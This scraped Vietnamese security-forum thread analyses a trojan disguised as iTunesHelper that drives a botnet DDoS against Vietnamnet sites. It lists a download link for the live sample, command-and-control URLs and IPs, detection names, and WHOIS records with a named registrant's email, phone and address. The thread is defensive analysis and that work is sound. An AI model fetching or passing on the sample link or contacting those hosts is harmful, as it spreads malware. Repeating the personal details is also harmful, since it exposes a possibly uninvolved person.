chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được . chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt?  
Ha ha, hoan hô 1visao =D) Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin. Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không? Thêm: Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn. Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận. Botnet này đánh vô tất cả các sites quan trọng của vietnamnet. Cập nhật: Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level. Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu. PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc.]]>
/hvaonline/posts/list/39641.html#245825 /hvaonline/posts/list/39641.html#245825 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245830 /hvaonline/posts/list/39641.html#245830 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt? 4 cái domain này dns vào afraid.org và sitelutions.com như mấy con domain trước của STL 3 em đều trong tình trạng clientTransferProhibited riêng em firebay.cn thì có chút info
Domain Name: firebay.cn ROID: 20080211s10001s67686910-cn Domain Status: ok Registrant ID: ct2vkafo9jfsvst Registrant Organization: 许士鎏 ( Liu, Xu Shi ) Registrant Name: 许士鎏 ( Liu, Xu Shi ) Registrant Email: stan@canadaad.com Sponsoring Registrar: 北京新网互联科技有限公司 ( Beijing Innovative Linkage Technology Co., Ltd. ) Name Server:ns1.dns.com.cn Name Server:ns2.dns.com.cn Name Server:ns2.afraid.org Name Server:ns1.afraid.org Registration Date: 2008-02-11 11:39:41 Expiration Date: 2012-02-11 11:39:41 Dnssec Deployment: N  
]]>
/hvaonline/posts/list/39641.html#245831 /hvaonline/posts/list/39641.html#245831 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Registrant: SHILIU XU @mocis.com +1.4167321430 MOCIS INC. SUITE 507, 45 GRENOBLE DR. NORTH YORK,ONTARIO,CA M3C 1C4 Domain Name:canadaad.com Record last updated at 2010-11-01 12:45:14 Record created on 2002/1/17 Record expired on 2012/1/17 Domain servers in listed order: ns1.dns-diy.net ns2.dns-diy.net Billing Contactor: name: SHILIU XU mail: @mocis.com tel: +1.4167321430 org: MOCIS INC. address: SUITE 507, 45 GRENOBLE DR. city: NORTH YORK ,province: ONTARIO ,country: CA postcode: M3C 1C4   whois nốt mocis.com
Registrant: shiliu xu @public.guangzhou.gd.cn +1.4167321430 MOCIS INC. SUITE 507, 45 GRENOBLE DR. TORONTO,ONTARIO,CA M3C 1C4 Domain Name:mocis.com Record last updated at 2011-05-27 15:17:06 Record created on 2004/7/9 Record expired on 2012/7/9  
]]>
/hvaonline/posts/list/39641.html#245832 /hvaonline/posts/list/39641.html#245832 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245839 /hvaonline/posts/list/39641.html#245839 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245841 /hvaonline/posts/list/39641.html#245841 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

1visao wrote:
chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được . chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt?  
Ha ha, hoan hô 1visao =D) Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin. Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không? Thêm: Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn. Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận. Botnet này đánh vô tất cả các sites quan trọng của vietnamnet. Cập nhật: Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level. Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu. PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc
Khi unrar con iTunes.rar ta có 4 files: data.mdf iTunesHelper-tray.exe iTunesHelper.exe ITUNESHELPER.EXE-2BE8106E.pf Thì thưc ra file data.mdf mới bị detect là 1 Trojan. Avira cũng đã detect nó là Trojan TR/Diple.acju Nhưng tôi lại nghi thành phần chính của DDoS tool là file iTunesHelper.exe cơ! Đang thử nghiệm thưc tế. ]]>
/hvaonline/posts/list/39641.html#245842 /hvaonline/posts/list/39641.html#245842 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245845 /hvaonline/posts/list/39641.html#245845 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 wrote:
Em vừa submit file ituneshelper.exe lên web của: Symantec, McAfee, Nod32, Microsoft, Avast, AVG, Bitdefender. Em tự hỏi chúng ta có nên liên lạc với danlambaovn nhờ họ thông báo rộng rãi cho đọc giả giúp submit các file nhiễm trojan STL lên các website của các chương trình antivirus không? 
Ta nên kiểm tra kỹ hơn và cũng nên kiểm tra trong thưc tế, khi có kết quả chính xác thì thông báo cũng kịp]]>
/hvaonline/posts/list/39641.html#245846 /hvaonline/posts/list/39641.html#245846 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245848 /hvaonline/posts/list/39641.html#245848 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.